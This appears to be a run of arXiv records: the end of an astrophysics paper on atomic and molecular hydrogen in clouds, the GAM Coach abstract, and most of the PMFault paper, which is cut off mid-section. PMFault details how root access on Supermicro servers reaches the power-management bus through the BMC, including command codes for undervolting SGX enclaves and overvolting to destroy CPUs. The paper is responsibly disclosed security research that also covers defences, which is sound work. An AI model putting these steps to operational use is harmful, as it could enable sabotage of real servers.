Figure 7: HI and H\({}_{2}\) fractions, \(x_{\rm HI}\) and \(2x_{\rm H_{2}}\) (blue and orange curves) and HI column densities, \(N_{\rm HI}\) (black curves) assuming \(\alpha G=1\), and \(\beta=0.1\), for \(\tilde{\sigma}_{g}=\) 0.1, 1, and 10, without and with CR attenuation (upper and lower panels). The curves are plotted as functions of the dust optical depth \(\tau_{\rm dust}\), or equivalently \(\tilde{\sigma}_{g}\times N\), where \(N\) is the gas column density.

## 4 Summary

In this paper we extend the analytic treatment presented by Sternberg et al. (2014) and Bialy & Sternberg (2016) (S14 and BS16) for the production of atomic hydrogen (HI) via FUV photodissociation at the boundaries of interstellar molecular (H\({}_{2}\)) clouds, to also include the effects of penetrating (low-energy) cosmic-rays for the growth of the total HI column densities. We focus on idealized one-dimensional gas slabs, consisting of outer photodissociation regions (PDRs) and inner cosmic-ray zones (CRZs). We compute the depth dependent steady-state abundances of the HI and H\({}_{2}\), in a balance between grain-surface formation of the H\({}_{2}\) and destruction via FUV photodissociation and cosmic-ray ionization. The FUV photodissociation rates are reduced by (standard) H\({}_{2}\) self-shielding, and dust absorption. For the cosmic-rays we assume either constant overall ionization rates, or models that include depth-dependent attenuation of the cosmic-ray fluxes. The physical parameters in the problem are (a) the free-space intensity, \(I_{\rm UV}\), of the FUV radiation and the associated H\({}_{2}\) photodissociation rate; (b) the free-space cosmic ray H\({}_{2}\) ionization rate, \(\zeta\); (c) the density, \(n\), of hydrogen nuclei, in atoms and molecules; (d) the H\({}_{2}\) formation rate coefficient \(R\); (e) the FUV dust absorption cross section \(\sigma_{g}\); (f) the gas temperature \(T\); and (g) a density enhancement factor, \(C\), for the cool CRZs relative to the warmer PDRs. An additional (chemical) parameter is the number, \(\phi\), of H\({}_{2}\) dissociations per cosmic-ray ionization event. 
The governing HI/H\({}_{2}\) formation-destruction equation that we solve is Eq. (1), or in differential form Eq. (13). The solutions for the HI and H\({}_{2}\) density profiles and the integrated HI columns, depend primarily on the ratios \(I_{\rm UV}/Rn\) and \(\zeta/Rn\), as encapsulated in our dimensionless parameters \(\alpha G\), and \(\beta\) (Eqs. [14], [15] and [23]). A third dimensionless parameter is the dust-to-gas ratio \(\tilde{\sigma}_{g}\). It sets the magnitude of both the dust absorption cross section, and the molecular formation rate coefficient. We solve Eq. (13) numerically, and we also develop simple analytic formulae for the growth of the HI column density in terms of \(\alpha G\) and \(\beta\) (Eqs. [19] and [22]). Our analytic formulae provide an excellent match to the numerical integrations. Our focus is on conditions (\(\beta\leq 1\)) for which the gas is primarily molecular in the optically thick cloud interiors. As we discuss in the Appendix, for these conditions cosmic-rays do not affect the locations of the HI-to-H\({}_{2}\) transition points. We consider both weak fields (\(\alpha G\ll 1\)) and strong fields (\(\alpha G\gg 1\)), and compute the critical cloud columns, \(N_{\rm crit}\), at which cosmic-rays dominate the production of the total HI columns. We write down analytic expressions for the critical columns. We also examine how the HI and H\({}_{2}\) profiles scale with the assumed dust-to-gas ratio. As an example, we apply our theory to Galactic giant molecular clouds (GMCs), with typical hydrogen gas column densities \(\sim 1.5\times 10^{22}\) cm\({}^{-2}\) (independent of mass). For GMCs we consider both plane-parallel slabs exposed to beamed FUV fields, and spherical clouds illuminated by isotropic radiation. For weak FUV fields, for which \(I_{\rm UV}/n\ll 3.4\times 10^{-2}\) cm\({}^{3}\), and with \(I_{\rm UV}=1\), the CRZ dominates the production of the HI if the free-space \(\zeta>5.1\times 10^{-16}\) s\({}^{-1}\). This estimate for the critical ionization rate includes cosmic-ray attenuation within the GMCs. For multiphased warm/cold HI within the PDRs, for which \(I_{\rm UV}/n\approx 3.4\times 10^{-2}\) cm\({}^{3}\), the CRZ dominates the HI if \(\zeta\gtrsim 4.5\times 10^{-16}\times(M_{\rm GMC}/10^{6}\ M_{\odot})^{-1/2}\) s\({}^{-1}\), where \(M_{\rm GMC}\) is the GMC mass. The very large critical ionization rates suggest that FUV photodissociation dominates the production of the HI in most Galactic GMCs. ## Acknowledgements We thank David Neufeld, Chris McKee, Eve Ostriker, and Mark Wolfire for discussions. We thank the referee for a careful reading of our manuscript and for helpful comments. This work was supported by the German Science Foundation via DFG/DIP grant STE/ 1869-2 GE/ 625 17-1, by the Center for Computational Astrophysics (CCA) of the Flatiron Institute, and by the Mathematical and Physical Sciences (MPS) division of the Simons Foundation, USA.
2302.14165
GAM Coach: Towards Interactive and User-centered Algorithmic Recourse
Machine learning (ML) recourse techniques are increasingly used in high-stakes domains, providing end users with actions to alter ML predictions, but they assume ML developers understand what input variables can be changed. However, a recourse plan's actionability is subjective and unlikely to match developers' expectations completely. We present GAM Coach, a novel open-source system that adapts integer linear programming to generate customizable counterfactual explanations for Generalized Additive Models (GAMs), and leverages interactive visualizations to enable end users to iteratively generate recourse plans meeting their needs. A quantitative user study with 41 participants shows our tool is usable and useful, and users prefer personalized recourse plans over generic plans. Through a log analysis, we explore how users discover satisfactory recourse plans, and provide empirical evidence that transparency can lead to more opportunities for everyday users to discover counterintuitive patterns in ML models. GAM Coach is available at: https://poloclub.github.io/gam-coach/.
Zijie J. Wang, Jennifer Wortman Vaughan, Rich Caruana, Duen Horng Chau
2023-02-27T21:57:42Z
http://arxiv.org/abs/2302.14165v2
# GAM Coach: Towards Interactive and User-centered Algorithmic Recourse ###### Abstract. Machine learning (ML) recourse techniques are increasingly used in high-stakes domains, providing end users with actions to alter ML predictions, but they assume ML developers understand what input variables can be changed. However, a recourse plan's actionability is subjective and unlikely to match developers' expectations completely. We present GAM Coach, a novel open-source system that adapts integer linear programming to generate customizable counterfactual explanations for Generalized Additive Models (GAMs), and leverages interactive visualizations to enable end users to iteratively generate recourse plans meeting their needs. A quantitative user study with 41 participants shows our tool is usable and useful, and users prefer personalized recourse plans over generic plans. Through a log analysis, we explore how users discover satisfactory recourse plans, and provide empirical evidence that transparency can lead to more opportunities for everyday users to discover counterintuitive patterns in ML models. GAM Coach is available at: [https://poloclub.github.io/gam-coach/](https://poloclub.github.io/gam-coach/).
2301.05538
PMFault: Faulting and Bricking Server CPUs through Management Interfaces
Apart from the actual CPU, modern server motherboards contain other auxiliary components, for example voltage regulators for power management. Those are connected to the CPU and the separate Baseboard Management Controller (BMC) via the I2C-based PMBus. In this paper, using the case study of the widely used Supermicro X11SSL motherboard, we show how remotely exploitable software weaknesses in the BMC (or other processors with PMBus access) can be used to access the PMBus and then perform hardware-based fault injection attacks on the main CPU. The underlying weaknesses include insecure firmware encryption and signing mechanisms, a lack of authentication for the firmware upgrade process and the IPMI KCS control interface, as well as the motherboard design (with the PMBus connected to the BMC and SMBus by default). First, we show that undervolting through the PMBus allows breaking the integrity guarantees of SGX enclaves, bypassing Intel's countermeasures against previous undervolting attacks like Plundervolt/V0ltPwn. Second, we experimentally show that overvolting outside the specified range has the potential of permanently damaging Intel Xeon CPUs, rendering the server inoperable. We assess the impact of our findings on other server motherboards made by Supermicro and ASRock. Our attacks, dubbed PMFault, can be carried out by a privileged software adversary and do not require physical access to the server motherboard or knowledge of the BMC login credentials. We responsibly disclosed the issues reported in this paper to Supermicro and discuss possible countermeasures at different levels. To the best of our knowledge, the 12th generation of Supermicro motherboards, which was designed before we reported PMFault to Supermicro, is not vulnerable.
Zitai Chen, David Oswald
2023-01-13T13:36:28Z
http://arxiv.org/abs/2301.05538v1
# PMFault: Faulting and Bricking Server CPUs through Management Interfaces ###### Abstract Apart from the actual CPU, modern server motherboards contain other auxiliary components, for example voltage regulators for power management. Those are connected to the CPU and the separate Baseboard Management Controller (BMC) via the I2C-based PMBus. In this paper, using the case study of the widely used Supermicro X11SSL motherboard, we show how remotely exploitable software weaknesses in the BMC (or other processors with PMBus access) can be used to access the PMBus and then perform hardware-based fault injection attacks on the main CPU. The underlying weaknesses include insecure firmware encryption and signing mechanisms, a lack of authentication for the firmware upgrade process and the IPMI KCS control interface, as well as the motherboard design (with the PMBus connected to the BMC and SMBus by default). First, we show that undervolting through the PMBus allows breaking the integrity guarantees of SGX enclaves, bypassing Intel's countermeasures against previous undervolting attacks like Plundervolt/VoltPwn. Second, we experimentally show that overvolting outside the specified range has the potential of permanently damaging Intel Xeon CPUs, rendering the server inoperable. We assess the impact of our findings on other server motherboards made by Supermicro and ASRock. Our attacks, dubbed PMFault, can be carried out by a privileged software adversary and do not require physical access to the server motherboard or knowledge of the BMC login credentials. We responsibly disclosed the issues reported in this paper to Supermicro and discuss possible countermeasures at different levels. To the best of our knowledge, the 12th generation of Supermicro motherboards, which was designed before we reported PMFault to Supermicro, is not vulnerable. Keywords:fault injection software-based faults Intel SGX under/overvolting ## 1 Introduction In recent years, the security implications of software-exposed power and clock management features have received substantial attention by the research community. Several attacks including CLKSCREW [17], Plundervolt [18], V0ltPwn [19], and VoltJockey [15] showed that undervolting or overclocking from software can be used to inject faults (e.g., bitflips) into computations and break Trusted Execution Environments (TEEs) like Intel Software Guard Extensions (SGX) and ARM TrustZone. Subsequent attacks like VoltPillager [14] and the work by Buhren et al. [1] showed that similar attacks can be mounted with direct access to the computer hardware, physically connecting to the control interface of the Voltage Regulator (VR). In particular, Chen et al. targeted the Serial Voltage Identification (SVID) interface used by Intel CPUs to set the desired supply voltage. However, apart from SVID, many systems, in particular servers, support a second interface, the so-called Power Management Bus (PMBus), to control the Voltage Regulator Module (VRM). PMBus is an open standard for digital power management [pmb] and has been adopted by more than 40 companies. It is based on the Inter-Integrated Circuit (I2C) bus and offers monitoring features apart from voltage and current control. Another component usually presents on server motherboards is the Baseboard Management Controller (BMC). 
This chip, intended to remotely manage the server even if e.g., the main CPU has crashed or is powered down, has connections to several buses and chips on the motherboard, including the I2C bus on which the VRM resides. Previous research on x86 platforms has focused on the software-hardware interface provided by the Central Processing Unit (CPU) itself and on the security within the perimeter of each individual component, e.g., the BMC [14] or Intel Management Engine (Intel ME) [13, 15, 16]. There is a lack of board-level security analysis that reviews the system and motherboard design and interactions between the different components: even if an individual part of the system is secure within its individual threat model, the combination of it with other parts can cause security risks. In our PMFault attacks, the privileged position of the BMC, combined with its large attack surface, makes it interesting from an adversary's perspective to exploit vulnerabilities of the system via power management features. ### Our Contribution Our main contributions in this paper are: _PMBus-based under/overvolting against server platforms:_ We first analyse the VRM management interface at the hardware level. We discovered that the semi-standardised PMBus can be used to control the CPU voltage. Using the case study of a widely-used server motherboard, the Supermicro X11SSL-CF, we explore this attack surface and show that software vulnerabilities in the BMC (or another programmable chip connected to the PMBus) can have severe consequences for the security and safety of the server platform. To determine if the vulnerabilities can affect other server motherboards, we also investigated the PMBus connections and usage on an ASRock E3C246D4I-2T and a Supermicro X12DPi-NT6. _PMBus access through BMC exploits:_ We then study the BMC firmware and--based on prior work in [1, 18, 19]--find that it can indeed be exploited to send arbitrary PMBus commands to control the voltage of the CPU. More precisely, due to several software vulnerabilities in the BMC, including incorrect firmware encryption and signing mechanisms and a lack of authentication for firmware upgrades and control interfaces, an attacker can manipulate the CPU voltage remotely, because the PMBus is connected to the BMC and the System Management Bus (SMBus) by default. _PMBus-based undervolting against SGX enclaves:_ With this, we observed the same faults as with Plundervolt/VoltPwn (CVE-2019-11157), including for code running inside an SGX enclave. As the BMC has an independent, external flash chip for its firmware, SGX attestation currently _does not_ have the ability to verify its status. Crucially, because the software voltage-control interface in Model Specific Register (MSR) 0x150 is not used, Intel's fix for CVE-2019-11157 does not address this attack. _Permanent denial-of-service through overvolting:_ We also discovered a novel overvolting attack: by sending a certain sequence of PMBus commands, we can set the CPU voltage outside the specification (as high as 2.84 V) and permanently brick the Xeon CPU used in our experiments. _Countermeasures and mitigations:_ Finally, we develop the PMBusDetect tool for detecting if the VRM is connected to the PMBus, and then discuss countermeasures and challenges in securing server platforms. Importantly, we point out that TEEs like SGX must not only rely on the security of the CPU itself, but also on that of management components and the hardware design of the platform. 
The details of our experiments and source code can be found at: [https://github.com/zt-chen/PMFault](https://github.com/zt-chen/PMFault). CVE number CVE-2022-43309 has been reserved for PMFault. ### Adversary Model In this paper, we assume a privileged software attacker, _i.e._, who has obtained root on the host CPU. This is the standard adversary model in the case of TEEs like SGX, and is also realistic in the case of overvolting to permanently destroy the CPU, which could be e.g., exploited by ransomware with root rights. Notably, our attacks do not require physical access (for additional hardware to be added to the system) and can thus be conducted remotely e.g., over SSH. ### Responsible Disclosure We have responsibly disclosed our findings to Intel and Supermicro in April 2022. We discussed the details of our methods in several calls with Supermicro, and they acknowledge the existence of the issue and are looking into deploying fixes for their 11th generation products like the Supermicro X11SSL-CF. Supermicro highlighted that the attacks do not replicate on their 12th generation, which e.g., include secure boot and update for the BMC and filtering on PMBus commands. Both of these features break the attack chains described in the paper. Intel considered the issue in the context of their own server motherboards and did not find them vulnerable. Intel did not comment on the impact on SGX. ### Related Work Since Boneh et al.'s seminal work on fault injection [1], the research community has devoted substantial efforts to investigating fault attacks and developing according countermeasures (cf. e.g., [1] for an overview). Software-based Fault InjectionOften, fault injection was considered a technique limited to attacks with physical access to the target. However, with the discovery of the Rowhammer effect [13], it was shown that faults can also be injected from software (through specific memory access patterns in the case of Rowhammer). Then, in 2017, Tang et al. showed that the clock management features of ARM processors can be exploited to inject faults into computations shielded inside a TEE like ARM TrustZone [14]. Similarly, Plundervolt, VoltPwn, and VoltJockey [15, 16, 17] (all tracked via CVE-2019-11157) use the software-exposed voltage control MSR in Intel processors to break the integrity guarantees of SGX enclaves. In response, Intel deployed a microcode update that disables the undervolting interface in MSR 0x150 and allows remote parties to verify correct configuration through SGX's remote attestation. Thus, purely software-based undervolting attacks against Intel processors were considered no longer possible. Hardware-based Fault Injection on TEEsThe second generation of undervolting attacks on TEEs like SGX and AMD Secure Encrypted Virtualization (SEV) require physical access to the target motherboard. In the case of VoltPillager [18], the adversary attaches two wires to the data and clock lines of the SVID bus and can then control the VRM external to the CPU, enabling undervolting even if Intel's microcode fixes for CVE-2019-11157 are installed. For AMD SEV, the adversary does not glitch the actual CPU, but the separate security co-processor, the AMD Secure Processor (SP) [10]. The adversary then proceeds to upload custom firmware to the SP to leak memory encryption keys and also endorsement secrets, which ultimately enable attacks without permanent physical access. 
Security of servers and BMCsIndependent of hardware-based attacks, the security of server platforms has received attention in the research community and wider society. In 2018, Bloomberg published a--since widely disproven--article that _incorrectly_ claimed the inclusion of small backdoor chips on Supermicro motherboards [14]. However, at the same time, researchers at Eclypsium showed that it is indeed possible to maliciously manipulate the BMC firmware of Supermicro motherboards from 8th to 11th generation [1], without the need to add a hardware implant. They also demonstrated how flashing corrupted BMC firmware can "brick" the server system by preventing it from booting. Niewohner [13] subsequently published a tool to exploit the (weak) firmware encryption of Supermicro BMCs. Other work, for example by Waisman et al. [12] and Perigaud et al. [14], has shown that software weaknesses in BMCs are not limited to Supermicro motherboards, but also apply to Dell, HP, and Lenovo systems. However, the implications of direct access to the PMBus from a compromised BMC have not been deeply studied to our knowledge. ### Paper Outline The remainder of this paper is structured as follows: in Section 2, we review the PMBus protocol and analyse its specific implementation and usage on Supermicro motherboards. Then, in Section 3, we describe Supermicro's BMC implementation and methods to modify the firmware. In Section 4, we experimentally investigate how a compromised BMC can interact with the VRM through the PMBus. We then use this to develop over/undervolting attacks in Section 5 and evaluate other server motherboards in Section 6, before concluding in Section 7. ## 2 Analysis of Power Management Bus We started our work by analysing how the PMBus is used on practical server motherboards. PMBus is an interface that is used to control the VRM, supplying the power to the CPU. The most recent publicly available specification is version 1.3 [pmb]. This specification standardises the physical interface, packet structure, and command set of the PMBus. However, some commands are left as "manufacturer specified", so that each VRM manufacturer can have a slightly different implementation of the command set. This matches what we found during our investigation of the MP2955 VRM on the Supermicro X11SSL-CF platform described in the following. ### Experimental Setup We carried out initial experiments with an Intel Xeon E3-1220 v6 (CPU family: 6, model: 158, microcode version: 0xea) on a Supermicro X11SSL-CF Rev 1.01 motherboard (BMC microcontroller ASPEED AST2400, firmware revision 01.63, BIOS version: 2.4). We used 64-bit Ubuntu 18.04.3 LTS with a stock 5.4.0-107-generic kernel, Intel SGX driver V2.11.0, and Intel SGX-SDK V2.15.100.3. We refer to this system as E3-1220V6-X11SSL-CF throughout the paper. An overview of the server motherboard representative for Supermicro's 11th generation products is shown in Figure 1. The target of the PMFault attack is an Intel CPU with SGX technology. As mentioned, our actual attacks do not require additional hardware or physical access to the system, though we soldered some wires to the motherboard during the analysis phase. On Intel platforms, the voltage of the CPU is controlled by an external VRM Integrated Circuit (IC). The CPU connects to the VRM via the SVID bus to control the voltage supplied by it. This interface for CPU voltage control is present on all desktop and server motherboards. However, server VRMs--including the Supermicro X11SSL-CF--often have an additional I2C-based communication interface called PMBus. 
This interface allows e.g., overclocking or fine-tuning of the CPU voltage. One of the crucial steps in the PMFault is to get access to this interface and understand the communication protocol, so that we gain full control of the CPU voltage. One of the design issues we found on our server motherboard is that the PMBus can be directly connected to the more general SMBus. There are various components on the system on that bus, including the CPU, BMC, and other I2C devices. A compromise of any of these components leads to the takeover of PMBus and thus control of the CPU voltage. In this paper, we use the BMC as the starting point of the attack, as it commonly exists on server platforms. In order to analyse the attack surface of the BMC, we further investigated its connection and hardware design on the Supermicro X11SSL-CF. First, we found that its firmware is stored in a Serial Peripheral Interface (SPI) flash chip, separate from the BIOS flash. We also found there are two Ethernet ports on the system for communication with the BMC: one is called "Management Ethernet" and is dedicated for server management. The other port can be shared between CPU and BMC so that devices on this Ethernet port can communicate with both CPU and BMC. Finally, the BMC also has a Keyboard Controller Style (KCS) interface that enables direct access from the Operating System (OS) running on the CPU. These management interfaces open a large attack surface on the BMC, and make remote attacks possible. ### Protocol Structure To be able to eavesdrop and forge PMBus commands, knowledge of the protocol structure shown in Figure 2 is necessary. The PMBus is an I2C-based protocol (with clock speed of 100 kHz-1 MHz and an open-drain data pin) and uses a master-slave communication mechanism. The master device can query or change the setting of the slave device. Each slave device is assigned a unique 7-bit device address. The master device first sends a starting bit to initiate a transmission. During transmission, every group of 9 bits forms a segment, with the 9th bit indicating ACK (0) or NACK (1) for every 8 bits received. The starting bit and the (N)ACK mechanism are handled at hardware level and do not need to be handled manually. The first segment is always sent by the master. The first 7 bits are the address of the target slave, and the 8th bit indicates whether this transmission is a read (1) or write (0). Figure 1: Overview of the connections on the server motherboard. The second segment is the register address to operate on. In the PMBus specification, this segment is called the _PMBus command_. The segments after the second one contain the data read from or written to the register. Interaction between PMBus and SVIDAlthough the functionality of the PMBus protocol is similar to SVID, they have different specifications for the digital signal interface and command sets. A VRM can have both SVID and PMBus interfaces, with the SVID interface directly connected to the CPU and the PMBus interface connected to the SMBus. Both interfaces can be used to control the voltage of the CPU, and some implementations of the PMBus specification also have commands to override the voltages set through the SVID interface. ### PMBus Commands For an adversary to communicate with the VRM and e.g., configure voltage levels, they also need to know the specific PMBus commands. As mentioned, the PMBus specification allows manufacturers to have custom implementations of PMBus commands. 
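To make the transaction format above concrete, the following is a minimal sketch (not taken from the paper's artifact) of issuing a PMBus read and write from Linux user space with the third-party python smbus2 package; the bus number, the 7-bit device address 0x20, and the READ_VOUT/VOUT_COMMAND codes are the values reported for the X11SSL-CF later in the text, and the kernel and library take care of the start bit, the read/write bit, and the ACK/NACK handling described above.

```python
# Minimal sketch of one PMBus transaction over Linux's I2C stack, using the
# third-party smbus2 package (pip install smbus2). Assumptions: the SMBus is
# exposed as /dev/i2c-1 (i2c_i801 driver) and the VRM answers at 7-bit
# address 0x20, as reported for the X11SSL-CF later in the paper.
from smbus2 import SMBus

VRM_ADDR     = 0x20  # first segment: 7-bit slave address (R/W bit added by the kernel)
READ_VOUT    = 0x8B  # second segment: standard PMBus command code
VOUT_COMMAND = 0x21  # standard PMBus command code for the output-voltage setting

with SMBus(1) as bus:
    # Read transaction: address segment (write), command segment 0x8B,
    # repeated start, address segment (read), then two data segments.
    raw = bus.read_word_data(VRM_ADDR, READ_VOUT)
    print(f"READ_VOUT raw word: 0x{raw:04x}")

    # Write transaction: address segment (write), command segment 0x21,
    # then two data segments carrying the new voltage code. Left commented
    # out: it only takes effect once PMBus override is enabled, and writing
    # it on a live machine is not harmless.
    # bus.write_word_data(VRM_ADDR, VOUT_COMMAND, new_vid)
```

How the returned word maps to an actual voltage depends on the VRM's VID table (5 mV versus 10 mV steps, selected via MFR_VR_CONFIG as described below), so the sketch leaves the value undecoded.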
The E3-1220V6-X11SSL-CF motherboard features an Monolithic Power MP2955 voltage regulator. To understand the PMBus implementation of this VRM, we first started looking for its datasheet, but unfortunately, found that it is not publicly available. However, on the Monolithic Power website1, we found the datasheet of an alternative VRM (MP2965) [Mon]. As both chips are manufactured by the same company, we used this datasheet as a reference and starting point to discover the available PMBus commands by analysing the PMBus traffic on the Supermicro X11SSL-CF. Footnote 1: [https://www.monolithcpower.com/](https://www.monolithcpower.com/) We found the relevant PMBus commands by reading and analysing the response (ACK or NACK) of the registers, and validating found commands according to the PMBus specification and the MP2965 datasheet : Table 1 gives the command name, command code, and description of each commands. The first three commands in the table are implemented according to the PMBus 1.3 specification [pmb], while the rest are manufacturer-specific. \begin{table} \begin{tabular}{l l l} \hline \hline Command name & Command code & Usage \\ \hline CMD\_PAGE & 0x00 & Switch between different voltage rails \\ CMD\_OPERATION & 0x01 & PMBus override \\ VOUT\_COMMAND & 0x21 & Output voltage settings \\ READ\_VOUT & 0x8B & Voltage reading from sensor \\ MFR\_VR\_CONFIG & 0xE4 & Enable overclock mode \\ MFR\_OCP\_TOTAL\_SET & 0xEE & Over-current protection configuration \\ \hline \hline \end{tabular} \end{table} Table 1: Discovered PMBus commands on E3-1220V6-X11SSL-CF. Figure 2: PMBus protocol structure With CMD_OPERATION, we can configure the operation mode of the VRM. By setting bit 1 of this register, we can enable the PMBus override mode. In this mode, the voltage configured in the VOUT_COMMAND register will override the voltage configuration from the SVID bus. Another command that is useful for PMFAULT is READ_VOUT, as it allows us to read the current voltage of the CPU and establish a baseline for undervolting. The MFR_VR_CONFIG register is manufacturer-specific. By setting bit 3 or bit 10 and configuring CMD_OPERATION, we could enable the tracking or fixed voltage overclocking mode, respectively. Bit 8 VID_STEP_SEL of MFR_VR_CONFIG also allow us to use an alternative mode of SVID. In this mode, the VRM uses 10 mV Voltage Identifier (VID) steps instead of the default of 5 mV. This makes overvolting up to 3 V possible, which is well beyond the operating voltage range of the E3-1220 V6 Intel CPU, with a maximum voltage of 1.52 V [11]. We also discovered that the VRM has an Over Current Protection (OCP) circuit, which can be configured or disabled by another manufacturer-specific register (MFR_OCP_TOTAL_SET). Some VRM also support multiple voltage output rails. CMD_PAGE command is used to select the target rail to send the commands to. With these discovered commands, we can now control the CPU voltage through the PMBus. In Section 4.1, we detail how this interface is used as part of attack chains for undervolting and overvolting attacks. ### Jumper Settings On the Supermicro X11SSL-CF motherboard, there are several jumpers that control different functionalities, including the connection of the VRM to other parts of the system. We kept all jumpers in the default status as delivered by the vendor. To avoid confusion, we still list the jumper settings in Table 2. 
During inspection of the jumper settings, we discovered that the SMBDAT_VRM and SMBCLK_VRM jumpers are neither mentioned in the user manual [Supb] nor in the quick reference guide [Supa]. Using an oscilloscope while sending PMBus commands, we found that these two jumpers can be used for (dis)connecting the VRM from/to the PMBus. The experiments and attacks described in this paper are conducted under the "connected" setting of both jumpers, which according to Supermicro is the default. We also found server motherboard without such jumpers, e.g., Supermicro X11SPG-TF and ASRock E3C246D4-2T. For those, the VRM is always connected to the BMC. We detail our finding on other motherboards in Section 6. It is worth mentioning that to the best of our knowledge, SGX attestation does not have the functionality to include the configuration of these (external) jumpers. ## 3 Supermicro's BMC and Server Management Interface Having understood the basic PMBus protocol and commands, we next look at different ways to gain access to the PMBus and send commands to the VRM. To achieve that, an attacker needs access to the SMBus. As described in Section 2.1, on E3-1220V6-X11SSL-CF, one of the devices on the SMBus is the ASPEED AST2400 BMC controller. In this \begin{table} \begin{tabular}{c l} \hline \hline Jumper name & Description \\ \hline JPME2 & Manufacturer mode normal (Default) \\ JPB1 & BMC enabled (Default) \\ SMBDAT\_VRM & Connect VRM data line to PMBus \\ SMBCLK\_VRM & Connect VRM clock line to PMBus \\ \hline \hline \end{tabular} \end{table} Table 2: Jumper settings on Supermicro X11SSL-CF. section, we introduce the functionalities and vulnerabilities in these management interfaces that allow us to achieve our main goal--to take control of the SMBus. During the initial investigation of the BMC, we found there are mainly three services available: there is a web service running on port 80 (HTTP) and 443 (HTTPS), an Intelligent Platform Management Interface (IPMI) over LAN service on port 623, and the SSH service on port 22. Besides, we also found that the IPMI service can be accessed through the KCS interface from the CPU. Some of these interfaces require authentication: to use HTTP, HTTPS, SSH, and IPMI -over-LAN, all exposed through Ethernet, one has to authenticate to the BMC. The used credentials in this authentication process are individual for each Supermicro motherboard. However, the IPMI-over-KCS interface does not require any authentication to the BMC. Instead, having root privileges on the host OS running on the CPU is sufficient to access this interface. One can also use the IPMI-over-KCS interface to add/remove/modify BMC credentials to subsequently login to the Ethernet-exposed interfaces. ### SSH Shell Since SSH is one of the most common interfaces that allows us to get a shell and possibly take over the system, we first started our investigation with it. However, the SSH service on E3-1220V6-X11SSL-CF provides a custom shell called "ATEN SMASH-CLP System Management Shell". It only provides limited commands that enable server monitoring and basic management. Previously, a vulnerability was reported in [14]: the command shell sh allows gaining root access from this shell, however, this command was not available on our system-under-investigation. ### BMC Firmware Analysis To further investigate the services running on the BMC and check if it is possible to enable an SSH root shell, we dumped the firmware of the BMC with a CH341A SPI flash programmer as shown in Figure 3. 
This procedure is only used once to assist our analysis, and is not necessary to execute the actual attack. We found that the firmware stored in the SPI flash is neither encrypted nor signed. There are five partitions in the firmware, where the second one contains a Linux operating system. The SMASH shell is provided by /SMASH/msh and it is possible to change it to a different shell by replacing this file. The Linux operating system also has an I2C kernel module installed, which provides an interface to communicate with the SMBus. However, during our testing in Section 4.1, we found that the API provided by this kernel module is not compatible with the commonly used libi2c in i2c-tool2. Figure 3: Dumping BMC firmware with a flash programmer. As a result, in Section 4.1, we opted to write a custom library to use the I2C interface of the BMC and communicate with the VRM. Footnote 2: [https://git.kernel.org/pub/scm/utils/i2c-tools/i2c-tools.git/](https://git.kernel.org/pub/scm/utils/i2c-tools/i2c-tools.git/) ### Firmware Upgrade After analysing the firmware, we conclude that it is possible to enable an SSH shell by modifying the firmware. We then started to look for software methods to re-flash the BMC SPI flash chip. We found that the firmware upgrade functionality of the BMC provides a way to do this. There are two interfaces for firmware upgrade: one is through the web interface, the other through the KCS interface. Through Web InterfaceThe web interface has a firmware upgrade page that can switch the BMC into upgrade mode and allows the user to upload a BMC firmware update package. To prevent unauthorised users from upgrading the firmware, there is a login portal. The user is authenticated by the BMC. As the BMC is a system independent from the OS running on the CPU, users do not need to have privileged access to the OS to be able to use this method. Besides, this web interface can be accessed remotely through Ethernet. The remote BMC firmware upgrade attack chain described in Section 4.3 uses this method to upgrade the firmware. Through IPMI-over-KCS InterfaceCrucially, the BMC firmware can also be updated through the KCS interface, using the following command: AlUpdate -f firmware.bin -i kcs -r y. As mentioned, the KCS interface can be accessed from the OS running on the CPU, only requiring root access to the OS, _but not the BMC credentials_. Firmware Upgrade PackageAfter finding the firmware upgrade interface, the next step is to produce an upgrade package that can be uploaded to the BMC. We started with the analysis of the structure of the upgrade package. Figure 4 shows the layout of a firmware upgrade package. Previous work [1] found that in the firmware upgrade package, there is a region that contains a magic value (\(\mathtt{ATENs\_FW}\)), a half-length CRC checksum, and the length of each section. We call this part the firmware footer. There is also a region containing metadata of the firmware image, including the name of each region and their length and CRC, starting with "[img]". We refer to this region as the firmware table. In the X11 series, the firmware table, the _file system header_ of the root file system and the website _file system header_ are AES-CBC encrypted. However, the files in these regions are not encrypted, but only LZMA compressed. As a result, the key of the AES-CBC encryption can be recovered from the ipmi.so file on the root file system. 
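As a rough illustration of the layout in Figure 4, the sketch below only searches a dumped image for the two landmarks named above, the ATENs_FW footer magic and the "[img]" firmware table, without assuming fixed offsets; it is not the actual repacking tooling (the modified decryptor and ipmi firmware tools mentioned later do that), and the search for "[img]" is only expected to succeed on a decrypted image or upgrade package.

```python
# Sketch: locate the firmware footer magic and the "[img]" firmware table in
# a dumped BMC image by searching, since exact offsets differ between images.
# Both spellings of the footer magic that appear in the text are tried.
import sys

def find_all(data: bytes, needle: bytes):
    """Yield every offset at which `needle` occurs in `data`."""
    pos = data.find(needle)
    while pos != -1:
        yield pos
        pos = data.find(needle, pos + 1)

def main(path: str) -> None:
    with open(path, "rb") as f:
        image = f.read()

    for magic in (b"ATENs_FW", b"ATEN_FW"):
        for off in find_all(image, magic):
            print(f"possible firmware footer ({magic.decode()}) at 0x{off:08x}")

    # The firmware table is AES-CBC encrypted on X11 images, so hits here are
    # only expected once the encrypted regions have been decrypted.
    for off in find_all(image, b"[img]"):
        print(f"possible firmware table at 0x{off:08x}")

if __name__ == "__main__":
    main(sys.argv[1])
```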
With this information, we can modify the firmware and construct a valid firmware upgrade package for the web interface. We discuss firmware repacking in detail in Section 4.2. ### IPMI I2C functionality When exploring the functionalities of IPMI, we also found that the interface also allows direct sending I2C packets with the ipmitool i2c command. This can be used either through the Ethernet or KCS IPMI channel. The authentication requirement for using IPMI-controlled I2C is the same as those described in Section 3.3. As shown in Section 4.3, we can use this functionality for direct access to the SMBus/PMBus _without_ modifying BMC firmware. ## 4 Practical Experiments Finally, using the results from the previous sections, we explain how to construct practical Proof-of-Concept (PoC) attacks for PMFault. Some of our experiments require physical access to the system to understand the hardware configuration (with an overview shown in Figure 5). Note however that physical access is not required when performing PMFault attacks on a real-world system, as the hardware components and connections are identical for a given motherboard model. ### PMBus-based Voltage Control To understand the configuration and capabilities of using the PMBus to control the CPU voltage, we conducted two experiments. Firstly, we used the "probe and verify" method to find the I2C address of the VRM. Then we tried different ways of sending commands to VRM to change the voltage. Figure 4: Layout of the BMC firmware upgrade package. The NVRAM region stores the current configuration of the BMC, the rootFS is a LZMA-compressed cramFS file system with only its header encrypted. The kernel region stores a Linux kernel 